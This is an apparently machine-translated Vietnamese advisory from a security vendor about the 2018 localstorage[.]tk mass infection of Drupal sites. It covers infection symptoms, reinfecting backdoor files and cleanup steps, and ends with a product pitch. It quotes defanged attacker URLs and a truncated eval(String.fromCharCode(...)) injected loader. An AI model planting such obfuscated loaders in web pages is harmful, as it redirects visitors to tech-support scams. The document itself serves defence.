Computer >> Máy Tính >  >> Kết nối mạng >> An ninh mạng

Lỗ hổng bảo mật nghiêm trọng:Kho lưu trữ cục bộ lớn [.] tk Nhiễm trùng Drupal

Mùa xuân năm 2018 đã chứng kiến ​​sự gia tăng đáng ngạc nhiên về số lượng các ca nhiễm bắt nguồn từ lỗ hổng Drupal. Từng được coi là một trong những CMS an toàn nhất trong số các đối tác của nó:WordPress và Joomla, và phục vụ cho một số doanh nghiệp trên toàn thế giới, Drupal gần đây đã phải đối mặt với một cuộc tấn công độc hại khác.

Người dùng Drupal hiện đang đối mặt với sự gia tăng lớn trong các vụ lây nhiễm, trong đó mới nhất là cuộc tấn công [.tk] lưu trữ cục bộ. Sự lây nhiễm đã ảnh hưởng đến hàng nghìn trang web của Drupal bằng cách chuyển hướng người dùng đến lừa đảo “ Hỗ trợ kỹ thuật” qua “js.localstorage [.] Tk”

Lỗ hổng bảo mật nghiêm trọng:Kho lưu trữ cục bộ lớn [.] tk Nhiễm trùng Drupal

Sự Drupal Nhiễm trùng

Khai thác Drupal này biểu hiện thông qua mã JavaScript độc hại, được đưa vào .tpl.php khác nhau , .html.twig .js các tập tin. Tập lệnh độc hại được đưa vào từ hxxps://js.localstorage [.] Tk / s.js? Crt =new hoặc cách khác có thể được tải từ hxxp://193.201.224 .233 / m.js? d =3 , dẫn đến các chuyển hướng độc hại. Hơn nữa, mã này còn đưa tập lệnh độc hại vào nhiều vị trí khác trong cơ sở dữ liệu. 

[code inline="true" scrollable="true"]eval (String .fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ...skipped... 100, 40, 122, 41, 59));
[/code]

Drupal:Các trang bị nhiễm có chứa mã JavaScript ở trên

Việc loại bỏ các mã JavaScript độc hại này khỏi tệp và cơ sở dữ liệu có thể vô ích, vì tin tặc đã tạo tệp để lây nhiễm lại tệp trong trường hợp chúng bị nghi ngờ là sạch. Các tệp này thường được coi là chứa các tên tệp ngẫu nhiên như “ g.php ”,“ tonure.php ”Hoặc“ jooner.php ”.

Sau đây là mã chèn phần mềm độc hại sẽ đưa tệp Javascript độc hại vào .tpl.php ,. html.twig , header.php, drupal.js tệp.

Lỗ hổng bảo mật nghiêm trọng:Kho lưu trữ cục bộ lớn [.] tk Nhiễm trùng Drupal

Một số triệu chứng phổ biến của Massive localstorage [.] tk Drupal Infection bao gồm:

  1. Các tệp index.php đang được tạo trong các thư mục con mà chúng không được cho là có.
  2. Phát hiện các tệp đáng ngờ trong các tệp và thư mục công khai có tên tệp ngẫu nhiên như “g.php”, “tonure.php”, “jooner.php” hoặc stats.php. Ngoài ra, có thể nảy sinh nghi ngờ khi phát hiện ra các tệp .ico và tệp PHP có tên hex đáng ngờ.
  3. Khám phá các tệp có ký tự ngẫu nhiên với phần mở rộng .ico và quyền index.php 0755 với phần bao gồm .ico trong mọi thư mục và thư mục con của trang web từ public_html.
  4. Đã xảy ra lỗi máy chủ 500 gặp phải trên máy chủ chạy SuPHPdue thay đổi quyền trên public_html thành 777.
  5. Tham chiếu đến tập lệnh tấn công trong cơ sở dữ liệu như sự xuất hiện của % localstorage% tham chiếu trong cơ sở dữ liệu.

Giảm nhẹ việc khai thác Drupal:localstorage [.] tk Infection

Mặc dù thiệt hại có thể đã được thực hiện, nhưng việc tuân theo một tập hợp các chiến lược giảm thiểu được phối hợp có thể thách thức bất kỳ hành vi khai thác nào khác và giảm thiểu đối với Lỗ hổng Drupal này. Các bước sau có thể được sử dụng để loại bỏ sự lây nhiễm Drupal này và giảm thiểu các lỗ hổng bảo mật trong tương lai:

  1. Nâng cấp phiên bản Drupal: Để làm sạch sự lây nhiễm này, bạn nên vá đầy đủ và nâng cấp lên phiên bản Drupal mới nhất (ít nhất là Drupal 7.59, Drupal 8.5.3 hoặc Drupal 8.4.8)
  2. Loại bỏ các cửa hậu :Bạn sẽ cần phải loại bỏ tất cả các cửa hậu (bao gồm các công việc cron độc hại), sau đó xóa phần mềm độc hại đã tiêm vào cơ sở dữ liệu và tệp Drupal bị nhiễm. Việc không gỡ bỏ các cửa hậu có thể đưa lại trang web Drupal của bạn vào phần mềm độc hại và các tệp mà bạn có thể đã làm sạch / thay thế sẽ bị nhiễm lại.
  3. Có khả năng việc loại bỏ nhiễm trùng theo một cách khác có thể dẫn đến việc loại bỏ nhiễm trùng ngay lập tức. Bạn nên làm theo hướng dẫn của Astra về việc dọn dẹp một trang web Drupal bị tấn công.
  4. Làm theo hướng dẫn từng bước như được giải thích trên diễn đàn Drupal chính thức
  5. Bạn nên sử dụng tường lửa trang web sẽ ngay lập tức vá các trang web của bạn chống lại các mối đe dọa sắp xảy ra, thông báo cho bạn về các lỗ hổng được phát hiện hoặc thông báo cho bạn để vá / cập nhật trang web của bạn ngay sau khi các bản vá / phiên bản được phát hành.

Tìm kiếm bảo mật kín nước cho Trang web Drupal của bạn chống lại các cuộc tấn công trực tuyến như vậy? Đăng ký Astra’s Drupal Securit Suite để đảm bảo an toàn khi bạn kinh doanh.

Để được trợ giúp ngay lập tức, hãy gửi tin nhắn cho chúng tôi trên tiện ích trò chuyện.

Tải xuống danh sách kiểm tra Hướng dẫn thực hành mã hóa an toàn cho nhà phát triển của Astra